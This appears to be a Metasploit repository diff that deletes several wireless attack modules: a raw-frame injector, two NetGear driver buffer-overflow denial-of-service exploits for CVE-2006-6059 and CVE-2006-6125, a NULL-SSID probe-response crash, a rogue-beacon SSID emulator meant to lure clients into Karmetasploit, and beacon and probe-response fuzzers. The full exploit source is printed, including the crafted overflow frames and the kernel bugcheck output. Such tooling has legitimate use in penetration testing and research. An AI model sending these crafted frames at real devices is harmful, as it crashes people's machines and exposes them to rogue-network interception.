|
|
||||||
'Name' => 'Wireless Frame (File) Injector',
|
|
||||||
'Description' => %q{
|
|
||||||
Inspired by Josh Wright's file2air, this module writes
|
|
||||||
wireless frames from a binary file to the air, allowing
|
|
||||||
you to substitute some addresses before it gets sent.
|
|
||||||
Unlike the original file2air (currently v1.1), this module
|
|
||||||
*does* take into account the ToDS and FromDS flags in the
|
|
||||||
frame when replacing any specified addresses.
|
|
||||||
},
|
|
||||||
# 11/03/2008
|
|
||||||
'Author' => 'kris katterjohn',
|
|
||||||
'License' => MSF_LICENSE
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options([
|
|
||||||
OptString.new('FILE', [true, 'Filename to write to the air']),
|
|
||||||
OptString.new('ADDR_DST', [false, 'Target MAC (e.g. 00:DE:AD:BE:EF:00)']),
|
|
||||||
OptString.new('ADDR_SRC', [false, 'Source MAC (e.g. 00:DE:AD:BE:EF:00)']),
|
|
||||||
OptString.new('BSSID', [false, 'BSSID (e.g. 00:DE:AD:BE:EF:00)']),
|
|
||||||
OptInt.new('NUM', [true, 'Number of frames to send', 1])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
begin
|
|
||||||
frame = File.read(datastore['FILE'])
|
|
||||||
rescue ::Exception
|
|
||||||
print_status("Couldn't read from \"#{datastore['FILE']}\": #{$!}")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
# Sending too much data can cause local problems, even if it's
|
|
||||||
# less than the 802.11 MTU. Gotta draw the line somewhere.
|
|
||||||
if frame.length < 10 or frame.length > 1800
|
|
||||||
print_status("Invalid frame size (should be 10-1800 bytes)")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
if datastore['BSSID'] or datastore['ADDR_DST'] or datastore['ADDR_SRC']
|
|
||||||
if not substaddrs(frame)
|
|
||||||
print_status("This module doesn't support modifying frames with both ToDS and FromDS set")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
print_status("Writing out #{datastore['NUM']} frames...")
|
|
||||||
|
|
||||||
datastore['NUM'].times do
|
|
||||||
wifi.write(frame)
|
|
||||||
end
|
|
||||||
|
|
||||||
close_wifi
|
|
||||||
end
|
|
||||||
|
|
||||||
def substaddrs(frame)
|
|
||||||
tods = (frame[1] & 1) == 1
|
|
||||||
fromds = (frame[1] & 2) == 2
|
|
||||||
|
|
||||||
if tods
|
|
||||||
if fromds
|
|
||||||
# Not going to handle this 4-address special-case
|
|
||||||
return nil
|
|
||||||
else
|
|
||||||
substaddr1(frame, datastore['BSSID'])
|
|
||||||
substaddr2(frame, datastore['ADDR_SRC'])
|
|
||||||
substaddr3(frame, datastore['ADDR_DST'])
|
|
||||||
end
|
|
||||||
else
|
|
||||||
if fromds
|
|
||||||
substaddr1(frame, datastore['ADDR_DST'])
|
|
||||||
substaddr2(frame, datastore['BSSID'])
|
|
||||||
substaddr3(frame, datastore['ADDR_SRC'])
|
|
||||||
else
|
|
||||||
substaddr1(frame, datastore['ADDR_DST'])
|
|
||||||
substaddr2(frame, datastore['ADDR_SRC'])
|
|
||||||
substaddr3(frame, datastore['BSSID'])
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
true
|
|
||||||
end
|
|
||||||
|
|
||||||
def substaddr1(frame, addr)
|
|
||||||
frame[4,6] = eton(addr) if addr
|
|
||||||
end
|
|
||||||
|
|
||||||
def substaddr2(frame, addr)
|
|
||||||
frame[10,6] = eton(addr) if addr
|
|
||||||
end
|
|
||||||
|
|
||||||
def substaddr3(frame, addr)
|
|
||||||
frame[16,6] = eton(addr) if addr
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,118 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Dos
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a buffer overflow in the NetGear MA521 wireless device
|
|
||||||
driver under Windows XP. When a specific malformed frame (beacon or probe response)
|
|
||||||
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
|
|
||||||
driver attempts to write to an attacker-controlled memory location. The vulnerability
|
|
||||||
is triggered by an invalid supported rates information element.
|
|
||||||
|
|
||||||
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
|
|
||||||
NetGear MA521 Cardbus adapter. A remote code execution module is also in development.
|
|
||||||
|
|
||||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
|
||||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
|
||||||
(external/ruby-lorcon/README) for more information.
|
|
||||||
},
|
|
||||||
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
['CVE', '2006-6059'],
|
|
||||||
['OSVDB', '30507'],
|
|
||||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'],
|
|
||||||
['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip']
|
|
||||||
]
|
|
||||||
))
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
|
|
||||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF'])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
stime = Time.now.to_i
|
|
||||||
rtime = datastore['RUNTIME'].to_i
|
|
||||||
count = 0
|
|
||||||
|
|
||||||
print_status("Creating malicious beacon frame...")
|
|
||||||
|
|
||||||
frame = create_beacon()
|
|
||||||
|
|
||||||
print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...")
|
|
||||||
|
|
||||||
while (stime + rtime > Time.now.to_i)
|
|
||||||
wifi.write(frame)
|
|
||||||
select(nil, nil, nil, 0.10) if (count % 100 == 0)
|
|
||||||
count += 1
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Completed sending #{count} beacons.")
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_beacon
|
|
||||||
ssid = Rex::Text.rand_text(6)
|
|
||||||
bssid = Rex::Text.rand_text(6)
|
|
||||||
seq = [rand(255)].pack('n')
|
|
||||||
|
|
||||||
frame =
|
|
||||||
"\x80" + # type/subtype
|
|
||||||
"\x00" + # flags
|
|
||||||
"\x00\x00" + # duration
|
|
||||||
eton(datastore['ADDR_DST']) + # dst
|
|
||||||
bssid + # src
|
|
||||||
bssid + # bssid
|
|
||||||
seq + # seq
|
|
||||||
Rex::Text.rand_text(8) + # timestamp value
|
|
||||||
"\x64\x00" + # beacon interval
|
|
||||||
"\x01\x00" + # capabilities
|
|
||||||
|
|
||||||
# ssid IE
|
|
||||||
"\x00" + ssid.length.chr + ssid +
|
|
||||||
|
|
||||||
# supported rates IE overflow
|
|
||||||
"\x01" + "\xFF" + ("\x41" * 255) +
|
|
||||||
|
|
||||||
# channel IE
|
|
||||||
"\x03" + "\x01" + channel.chr
|
|
||||||
|
|
||||||
return frame
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
=begin
|
|
||||||
*******************************************************************************
|
|
||||||
* *
|
|
||||||
* Bugcheck Analysis *
|
|
||||||
* *
|
|
||||||
*******************************************************************************
|
|
||||||
|
|
||||||
DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
|
|
||||||
An attempt was made to access a pageable (or completely invalid) address at an
|
|
||||||
interrupt request level (IRQL) that is too high. This is usually
|
|
||||||
caused by drivers using improper addresses.
|
|
||||||
If kernel debugger is available get stack backtrace.
|
|
||||||
Arguments:
|
|
||||||
Arg1: 41414141, memory referenced
|
|
||||||
Arg2: 00000002, IRQL
|
|
||||||
Arg3: 00000000, value 0 = read operation, 1 = write operation
|
|
||||||
Arg4: aa1ec75a, address which referenced memory
|
|
||||||
=end
|
|
|
@ -1,116 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Dos
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'NetGear WG311v1 Wireless Driver Long SSID Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a buffer overflow in the NetGear WG311v1 wireless device
|
|
||||||
driver under Windows XP and 2000. A kernel-mode heap overflow occurs
|
|
||||||
when malformed probe response frame is received that contains a long SSID field
|
|
||||||
|
|
||||||
This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a
|
|
||||||
NetGear WG311v1 PCI card. A remote code execution module is also in development.
|
|
||||||
|
|
||||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
|
||||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
|
||||||
(external/ruby-lorcon/README) for more information.
|
|
||||||
},
|
|
||||||
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
['CVE', '2006-6125'],
|
|
||||||
['OSVDB', '30511'],
|
|
||||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
|
|
||||||
['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'],
|
|
||||||
]
|
|
||||||
))
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
|
|
||||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
stime = Time.now.to_i
|
|
||||||
rtime = datastore['RUNTIME'].to_i
|
|
||||||
count = 0
|
|
||||||
|
|
||||||
print_status("Creating malicious probe response frame...")
|
|
||||||
|
|
||||||
frame = create_probe_response()
|
|
||||||
|
|
||||||
print_status("Sending malicious probe response frames for #{datastore['RUNTIME']} seconds...")
|
|
||||||
|
|
||||||
while (stime + rtime > Time.now.to_i)
|
|
||||||
wifi.write(frame)
|
|
||||||
select(nil, nil, nil, 0.10) if (count % 100 == 0)
|
|
||||||
count += 1
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Completed sending #{count} probe responses.")
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_probe_response
|
|
||||||
bssid = Rex::Text.rand_text(6)
|
|
||||||
seq = [rand(255)].pack('n')
|
|
||||||
|
|
||||||
frame =
|
|
||||||
"\x50" + # type/subtype
|
|
||||||
"\x00" + # flags
|
|
||||||
"\x00\x00" + # duration
|
|
||||||
eton(datastore['ADDR_DST']) + # dst
|
|
||||||
bssid + # src
|
|
||||||
bssid + # bssid
|
|
||||||
seq + # seq
|
|
||||||
Rex::Text.rand_text(8) + # timestamp value
|
|
||||||
"\x64\x00" + # beacon interval
|
|
||||||
"\x01\x00" + # capabilities
|
|
||||||
|
|
||||||
# SSID IE overflow
|
|
||||||
"\x00" + "\xff" + ("\x41" * 255) +
|
|
||||||
|
|
||||||
# supported rates IE
|
|
||||||
"\x01" + "\x08" + "\x02\x04\x0b\x16\x0c\x18\x30\x48" +
|
|
||||||
|
|
||||||
# channel IE
|
|
||||||
"\x03" + "\x01" + channel.chr
|
|
||||||
|
|
||||||
return frame
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
=begin
|
|
||||||
*******************************************************************************
|
|
||||||
* *
|
|
||||||
* Bugcheck Analysis *
|
|
||||||
* *
|
|
||||||
*******************************************************************************
|
|
||||||
|
|
||||||
BAD_POOL_HEADER (19)
|
|
||||||
The pool is already corrupt at the time of the current request.
|
|
||||||
This may or may not be due to the caller.
|
|
||||||
The internal pool links must be walked to figure out a possible cause of
|
|
||||||
the problem, and then special pool applied to the suspect tags or the driver
|
|
||||||
verifier to a suspect driver.
|
|
||||||
Arguments:
|
|
||||||
Arg1: 00000020, a pool block header size is corrupt.
|
|
||||||
Arg2: 81cae7b0, The pool entry we were looking for within the page.
|
|
||||||
Arg3: 81cae8c8, The next pool entry.
|
|
||||||
Arg4: 0a23002b, (reserved)
|
|
||||||
=end
|
|
|
@ -1,74 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Dos
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Multiple Wireless Vendor NULL SSID Probe Response',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a firmware-level vulnerability in a variety of
|
|
||||||
802.11b devices. This attack works by sending a probe response frame
|
|
||||||
containing a NULL SSID information element to an affected device. This
|
|
||||||
flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere,
|
|
||||||
Orinoco, and the first generation of Airport cards).
|
|
||||||
},
|
|
||||||
|
|
||||||
'Author' => [ 'hdm' ],
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'],
|
|
||||||
['WVE', '2006-0064']
|
|
||||||
]
|
|
||||||
))
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
|
|
||||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
cnt = datastore['COUNT'].to_i
|
|
||||||
|
|
||||||
print_status("Creating malicious probe response frame...")
|
|
||||||
frame = create_frame()
|
|
||||||
|
|
||||||
print_status("Sending #{cnt} frames...")
|
|
||||||
cnt.times { wifi.write(frame) }
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_frame
|
|
||||||
bssid = Rex::Text.rand_text(6)
|
|
||||||
seq = [rand(255)].pack('n')
|
|
||||||
caps = [rand(65535)].pack('n')
|
|
||||||
|
|
||||||
frame =
|
|
||||||
"\x50" + # type/subtype
|
|
||||||
"\x00" + # flags
|
|
||||||
"\x00\x00" + # duration
|
|
||||||
eton(datastore['ADDR_DST']) + # dst
|
|
||||||
bssid + # src
|
|
||||||
bssid + # bssid
|
|
||||||
seq + # seq
|
|
||||||
Rex::Text.rand_text(8) + # timestamp value
|
|
||||||
Rex::Text.rand_text(2) + # beacon interval
|
|
||||||
Rex::Text.rand_text(2) + # capabilities
|
|
||||||
[0, 0].pack('CC') # Type=SSID(0) Length=0
|
|
||||||
|
|
||||||
return frame
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,108 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon
|
|
||||||
include Msf::Auxiliary::Dos
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Wireless Beacon SSID Emulator',
|
|
||||||
'Description' => %q{
|
|
||||||
This module sends out beacon frames using SSID's identified in a
|
|
||||||
specified file and randomly selected BSSID's. This is useful when
|
|
||||||
combined with a Karmetasploit attack to get clients configured to
|
|
||||||
not probe for networks in their PNL to start probing when they see a
|
|
||||||
matching SSID in from this script. For a list of common SSID's to
|
|
||||||
use with this script, check http://www.wigle.net/gps/gps/main/ssidstats.
|
|
||||||
If a file of SSID's is not specified, a default list of 20 SSID's will
|
|
||||||
be used. This script will run indefinitely until interrupted.
|
|
||||||
},
|
|
||||||
|
|
||||||
'Author' => [ 'joswr1ght', 'hdm' ],
|
|
||||||
'License' => MSF_LICENSE
|
|
||||||
))
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('SSIDS_FILE', [ false, "Filename of SSID's to broadcast, one per line"])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
def run
|
|
||||||
|
|
||||||
@@uni = 0
|
|
||||||
|
|
||||||
frames = []
|
|
||||||
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
ssidlist = []
|
|
||||||
if datastore['SSIDS_FILE']
|
|
||||||
begin
|
|
||||||
ssidfile = File.new(datastore['SSIDS_FILE'], "r")
|
|
||||||
rescue ::Exception
|
|
||||||
print_status("Couldn't read from \"#{datastore['SSIDS_FILE']}\": #{$!}")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
ssidfile.each_line do |line|
|
|
||||||
ssidlist.push line.chomp
|
|
||||||
end
|
|
||||||
else
|
|
||||||
ssidlist = ["linksys", "default", "NETGEAR", "Belkin54g", "Wireless",
|
|
||||||
"WLAN", "home", "DLINK", "smc", "tsunami", "tmobile", "101", "panera",
|
|
||||||
"hhonors", "GlobalSuiteWireless", "Internet", "WiFi", "public", "guest",
|
|
||||||
"test"]
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Sending beacon frames...")
|
|
||||||
|
|
||||||
while (true)
|
|
||||||
ssidlist.each do |ssid|
|
|
||||||
#print_status("Sending frame for SSID #{ssid}")
|
|
||||||
frame = create_frame(ssid)
|
|
||||||
wifi.write(frame)
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
def create_frame(ssid)
|
|
||||||
mtu = 1500 # 2312 # 1514
|
|
||||||
ies = rand(1024)
|
|
||||||
|
|
||||||
bssid = "0" + ssid[0..4]
|
|
||||||
seq = [rand(255)].pack('n')
|
|
||||||
|
|
||||||
frame =
|
|
||||||
"\x80" + # type/subtype
|
|
||||||
"\x00" + # flags
|
|
||||||
"\x00\x00" + # duration
|
|
||||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
|
||||||
bssid + # src
|
|
||||||
bssid + # bssid
|
|
||||||
seq + # seq
|
|
||||||
Rex::Text.rand_text(8) + # timestamp value
|
|
||||||
"\x64\x00" + # beacon interval
|
|
||||||
"\x04\x01" + # capability flags
|
|
||||||
|
|
||||||
# ssid tag
|
|
||||||
"\x00" + ssid.length.chr + ssid +
|
|
||||||
|
|
||||||
# supported rates
|
|
||||||
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
|
|
||||||
|
|
||||||
# current channel
|
|
||||||
"\x03" + "\x01" + channel.chr
|
|
||||||
|
|
||||||
return frame
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,33 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Dos
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Wireless Test Module',
|
|
||||||
'Description' => %q{
|
|
||||||
This module is a test of the wireless packet injection system.
|
|
||||||
Please see external/ruby-lorcon/README for more information.
|
|
||||||
},
|
|
||||||
|
|
||||||
'Author' => [ 'hdm' ],
|
|
||||||
'License' => MSF_LICENSE
|
|
||||||
))
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
open_wifi
|
|
||||||
wifi.write("X" * 1000)
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -1,127 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Dos
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Wireless Beacon Frame Fuzzer',
|
|
||||||
'Description' => %q{
|
|
||||||
This module sends out corrupted beacon frames.
|
|
||||||
},
|
|
||||||
|
|
||||||
'Author' => [ 'hdm' ],
|
|
||||||
'License' => MSF_LICENSE
|
|
||||||
))
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
|
|
||||||
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def ping_check
|
|
||||||
1.upto(3) do |i|
|
|
||||||
x = `ping -c 1 -n #{datastore['PING_HOST']}`
|
|
||||||
return true if x =~ /1 received/
|
|
||||||
if (i > 1)
|
|
||||||
print_status("Host missed a ping response...")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
return false
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
|
|
||||||
srand(0)
|
|
||||||
|
|
||||||
@@uni = 0
|
|
||||||
|
|
||||||
frames = []
|
|
||||||
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
print_status("Sending corrupt frames...")
|
|
||||||
|
|
||||||
while (true)
|
|
||||||
frame = create_frame()
|
|
||||||
|
|
||||||
if (datastore['PING_HOST'])
|
|
||||||
|
|
||||||
if (frames.length >= 5)
|
|
||||||
frames.shift
|
|
||||||
frames.push(frame)
|
|
||||||
else
|
|
||||||
frames.push(frame)
|
|
||||||
end
|
|
||||||
|
|
||||||
1.upto(3) do
|
|
||||||
wifi.write(frame)
|
|
||||||
if (not ping_check())
|
|
||||||
frames.each do |f|
|
|
||||||
print_status "****************************************"
|
|
||||||
print_status f.inspect
|
|
||||||
end
|
|
||||||
return
|
|
||||||
end
|
|
||||||
end
|
|
||||||
else
|
|
||||||
wifi.write(frame)
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
def create_frame
|
|
||||||
mtu = 1500 # 2312 # 1514
|
|
||||||
ies = rand(1024)
|
|
||||||
|
|
||||||
ssid = Rex::Text.rand_text_alphanumeric(rand(256))
|
|
||||||
bssid = Rex::Text.rand_text(6)
|
|
||||||
seq = [rand(255)].pack('n')
|
|
||||||
|
|
||||||
frame =
|
|
||||||
"\x80" + # type/subtype
|
|
||||||
"\x00" + # flags
|
|
||||||
"\x00\x00" + # duration
|
|
||||||
eton(datastore['ADDR_DST']) + # dst
|
|
||||||
bssid + # src
|
|
||||||
bssid + # bssid
|
|
||||||
seq + # seq
|
|
||||||
Rex::Text.rand_text(8) + # timestamp value
|
|
||||||
"\x64\x00" + # beacon interval
|
|
||||||
#"\x00\x05" + # capability flags
|
|
||||||
Rex::Text.rand_text(2) +
|
|
||||||
|
|
||||||
# ssid tag
|
|
||||||
"\x00" + ssid.length.chr + ssid +
|
|
||||||
|
|
||||||
# supported rates
|
|
||||||
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
|
|
||||||
|
|
||||||
# current channel
|
|
||||||
"\x03" + "\x01" + channel.chr
|
|
||||||
|
|
||||||
1.upto(ies) do |i|
|
|
||||||
max = mtu - frame.length
|
|
||||||
break if max < 2
|
|
||||||
t = rand(256)
|
|
||||||
l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1)
|
|
||||||
d = Rex::Text.rand_text(l)
|
|
||||||
frame += t.chr + l.chr + d
|
|
||||||
end
|
|
||||||
|
|
||||||
return frame
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -1,126 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Dos
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Wireless Probe Response Frame Fuzzer',
|
|
||||||
'Description' => %q{
|
|
||||||
This module sends out corrupted probe response frames.
|
|
||||||
},
|
|
||||||
|
|
||||||
'Author' => [ 'hdm' ],
|
|
||||||
'License' => MSF_LICENSE
|
|
||||||
))
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
|
|
||||||
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def ping_check
|
|
||||||
1.upto(3) do |i|
|
|
||||||
x = `ping -c 1 -n #{datastore['PING_HOST']}`
|
|
||||||
return true if x =~ /1 received/
|
|
||||||
if (i > 1)
|
|
||||||
print_status("Host missed a ping response...")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
return false
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
|
|
||||||
srand(0)
|
|
||||||
|
|
||||||
@@uni = 0
|
|
||||||
|
|
||||||
frames = []
|
|
||||||
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
print_status("Sending corrupt frames...")
|
|
||||||
|
|
||||||
while (true)
|
|
||||||
frame = create_frame()
|
|
||||||
|
|
||||||
if (datastore['PING_HOST'])
|
|
||||||
|
|
||||||
if (frames.length >= 5)
|
|
||||||
frames.shift
|
|
||||||
frames.push(frame)
|
|
||||||
else
|
|
||||||
frames.push(frame)
|
|
||||||
end
|
|
||||||
|
|
||||||
1.upto(10) do
|
|
||||||
wifi.write(frame)
|
|
||||||
if (not ping_check())
|
|
||||||
frames.each do |f|
|
|
||||||
print_status "****************************************"
|
|
||||||
print_status f.inspect
|
|
||||||
end
|
|
||||||
return
|
|
||||||
end
|
|
||||||
end
|
|
||||||
else
|
|
||||||
wifi.write(frame)
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_frame
|
|
||||||
mtu = 500
|
|
||||||
ies = rand(1024)
|
|
||||||
|
|
||||||
bssid = Rex::Text.rand_text(6)
|
|
||||||
seq = [rand(255)].pack('n')
|
|
||||||
|
|
||||||
frame =
|
|
||||||
"\x50" + # type/subtype
|
|
||||||
"\x00" + # flags
|
|
||||||
"\x00\x00" + # duration
|
|
||||||
eton(datastore['ADDR_DST']) + # dst
|
|
||||||
bssid + # src
|
|
||||||
bssid + # bssid
|
|
||||||
seq + # seq
|
|
||||||
Rex::Text.rand_text(8) + # timestamp value
|
|
||||||
Rex::Text.rand_text(2) + # beacon interval
|
|
||||||
Rex::Text.rand_text(2) # capability flags
|
|
||||||
|
|
||||||
ssid = Rex::Text.rand_text_alphanumeric(rand(256))
|
|
||||||
|
|
||||||
# ssid tag
|
|
||||||
frame << "\x00" + ssid.length.chr + ssid
|
|
||||||
|
|
||||||
# supported rates
|
|
||||||
frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48"
|
|
||||||
|
|
||||||
# current channel
|
|
||||||
frame << "\x03" + "\x01" + channel.chr
|
|
||||||
|
|
||||||
1.upto(ies) do |i|
|
|
||||||
max = mtu - frame.length
|
|
||||||
break if max < 2
|
|
||||||
t = rand(256)
|
|
||||||
l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1)
|
|
||||||
d = Rex::Text.rand_text(l)
|
|
||||||
frame += t.chr + l.chr + d
|
|
||||||
end
|
|
||||||
|
|
||||||
return frame
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
})
|
})
|
||||||
|
|
||||||
if res.nil? or res.body.empty?
|
if res.nil? or res.body.empty?
|
||||||
vprint_error("#{peer} - No content retrieved from")
|
vprint_error("#{peer} - No content retrieved")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -1,120 +0,0 @@
|
||||||
##
|
|
||||||
